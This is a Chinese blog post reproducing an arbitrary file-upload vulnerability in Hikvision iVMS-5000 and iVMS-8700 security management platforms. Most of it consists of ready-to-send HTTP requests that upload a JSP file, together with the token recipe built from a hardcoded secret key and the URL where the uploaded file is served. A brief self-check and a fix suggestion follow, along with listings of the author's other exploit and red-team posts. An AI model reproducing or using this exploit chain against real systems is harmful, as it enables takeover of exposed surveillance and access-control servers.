漏洞复现-海康威视系列

于 2024-03-15 09:40:40 发布
阅读量496 收藏 11
点赞数 10
分类专栏: 网络安全-渗透测试 文章标签: 安全 运维 web安全
amingMM
本文链接:https://blog.csdn.net/qq_33608000/article/details/136729501
版权

在这里插入图片描述

漏洞复现-海康威视

海康iVMS综合安防存在文件上传

https://mp.weixin.qq.com/s/Ajod_ZM1nTFhi1Gvb0CGig
综合安防系统是一款功能强大的综合性管理平台,其特点是视频监控与门禁一卡通的深度融合,海康的系统在系统中大量存在,出于学习的目的,通过授权测试对象对该漏洞进行研究和复现。

海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700


POST /eps/api/resourceOperations/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://ip:port
Connection: close
Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9
Upgrade-Insecure-Requests: 1
Content-Length: 62

service=http%3A%2F%2Fip:port%3Ax%2Fhome%2Findex.action







POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
 
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
 
test
------WebKitFormBoundaryGEJwiloiPo

其中token的值为

MD5(http://ip:port/eps/api/resourceOperations/uploadsecretKeyIbuilding)的值

访问上传文件的路径为http://ip:port/eps/upload/resourceUuid.jsp

在这里插入图片描述

自查方式:通过发送前文提到的漏洞探测数据包,观察返回的状态码为200,并且提示token empty!字样则可能存在漏洞,需要及时排查修复。

修复建议:关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。

参考链接:

https://blog.csdn.net/qq_50854662/article/details/131481634

amingMM
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
红队系列-网络安全知识锦囊(持续更新)
11-09 707
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
博客
Python AI股票自动化量化交易经济金融市场分析(每日更新)
10-14 2007
一种基于量化分析(Quantitative Analysis)的交易方式。量化交易需要三大技能: 数学功底、编程技能、金融知识。网上有种说法,从事量化交易需要的知识比重如下:计算机-金融-数学,知识比重为1-3-6。
博客
微服务和VUE入门教程(16): zuul 熔断
07-20 411
1. 前言在开发工程中,我们发现当一个微服务挂掉之后,如果我们访问此微服务的接口,zuul也会挂掉。因为zuul负责分配请求,当目标微服务挂掉之后,zuul便找不到目标微服务,因为我们需要设置一个熔断,即使寻找不到目标微服务,zuul也不会挂掉。比如我们停掉my-user微服务,然后访问其中的一个接口,zuul会出现以下错...
博客
sqlback@memeware.net].2700勒索病毒
06-05 401
该病毒具有持续性威胁,可加密文件并窃取敏感信息。继续潜伏在计算机系统中,构成一种持续的威胁。受害者即使支付了赎金,也可能无法完全摆脱病毒的困扰。支付了赎金并获得了解密密钥,也不能保证病毒已经完全清除。病毒可能仍然隐藏在系统的某个角落,等待合适的时机再次发作。国内知名制造企业“明日科技”的IT部门突然接到了紧急通知,公司的服务器疑似遭受了未知病毒的攻击。技术人员迅速登录服务器进行检查,发...
博客
uniapp中Tabbar底部导航栏
06-05 356
pages.json 中tabBar字段{ "pages": [ //pages数组中第一项表示应用启动页,参考:https://uniapp.dcloud.io/collocation/pages { "path": "pages/index/index", "style": { "navigationBarTitleTe...
博客
uniapp中动态首页的实现
06-05 389
<Page :items="items" /><template> <block v-if="item.type === 'banner'"> <Banner :itemStyle="item.style" :params="item.params" :dataList="item.data" /> </bloc...
博客
shellcode bypass免杀集合
06-05 323
https://blog.csdn.net/qq_33608000/article/details/134369237这篇文章陆续更新统计收集经过测试的一些免杀知识东拼西凑还是可以免杀的主要还是一些思路和知识点欢迎收藏交流...
博客
溯源应急反制
06-05 208
刚写了溯源应急反制的文章大融合持续更新可作为笔记参考过来看看吧https://blog.csdn.net/qq_33608000/article/details/134306443我的博客一起来玩
博客
渗透测试红队信息收集大全
06-05 410
在写工具(造轮子)的时候遇到的有关信息收集一些概念和思路关于自动化信息收集小伙伴们喜欢的可以一起聊一聊文章持续更新感谢收藏和关注https://blog.csdn.net/qq_33608000/article/details/134069500...
博客
PHP_CMS系统代码解析-wordpress
06-05 362
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。模板基本文件使用模板通过函数的调用,让模板之间形成完整的整体。style.css : CSS(样式表)文件index.php : 主页模板archive.php : Archive/Category模板...
博客
机器学习与量化交易 分类任务
06-05 549
> Julyedu.com 感谢 白嫖的 七月在线 专注数据领域的在线教育01 自动化交易综述时间序列分析策略建模及其优化方法策略评价与回测风险管理交易策略的实现交易策略的执行BP(Back Proppagation)算法误差反向传播(Error Back Propagation, BP)算法。学习过程由信号的正向传播与误差的反向传播两个过程组成。Algorithmic Tra...
博客
vue-i18n国际化多国语言
06-03 315
uniapp是自带有i18n这个插件需要自己去给每一个需要国际化的字符去手动配置key,所以如果是已经完成的项目可能工作量就稍微有点大了第一步:语言命名是有规范的不能乱取名,具体可以参考国际语言代码https://blog.csdn.net/weixin_44988005/article/details/113826664https://blog.csdn.net/hcx_2008/a...
博客
雷池waf功能代码剖析
05-31 292
看到他们发文章​-动态防护功能?了解一下具体是什么功能就是处理了一下 html 和 js看一下雷池代码的 构成是 后台的代码Go 语言使用Gin框架启动一个API服务器...
博客
红队专题-渗透工具-hydra爆破神器
03-15 649
主要步骤讲完后,下面来看看整个代码,看如何用shell程序将这些串起来。当然,能否破解成功,有一个好用的工具固然重要,但还需要一个强健的密码本。grep “host:”用来过滤打印的输出,只输出破解到密码的条目。第二步为,读取22-output.txt文件中开放22端口的主机,这条命令的含义是采用密码本./password.txt中的密码,因此,在shell中写了一个循环,hydra一次任务结束后,遍历代码很简单,不用惊讶,这就是shell脚本的神奇之处。对一个网段的扫描,也可以换成一个IP。
博客
漏洞复现-H3C系列
03-15 940
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
博客
漏洞复现-红帆OA系列
03-15 1274
红帆OA--------------------------------------------fofa:app=“红帆-ioffice”
博客
漏洞复现-宏景HJSOFT系列
03-15 1299
宏景HCM--------------------------------------------fofa:app=“HJSOFT-HCM”
博客
漏洞复现-大华dahua系列
03-15 486
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台devicePoint_addImgIco存在文件上传漏洞,攻击者利用该漏洞可以获取服务器权限。app=“dahua-智慧园区综合管理平台”
博客
漏洞复现-金和OA系列
03-14 1069
|| banner=“Path=/jc6”金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”请联系厂家 http://www.jinher.com/升级。
博客
漏洞复现-金蝶系列
03-14 1096
金蝶软件是中国领先的企业管理软件及云服务提供商,拥有众多产品和解决方案,其中包括四个主要产品系列。这四个产品系列分别是:金蝶ERP(Enterprise Resource Planning): 金蝶ERP是金蝶软件的核心产品之一,是一套全面的企业管理软件解决方案,涵盖了财务、供应链管理、生产制造、人力资源管理等多个领域,为企业提供全面的业务管理功能。金蝶ERP产品线包括不同版本,以满足不同规模和行业的企业需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值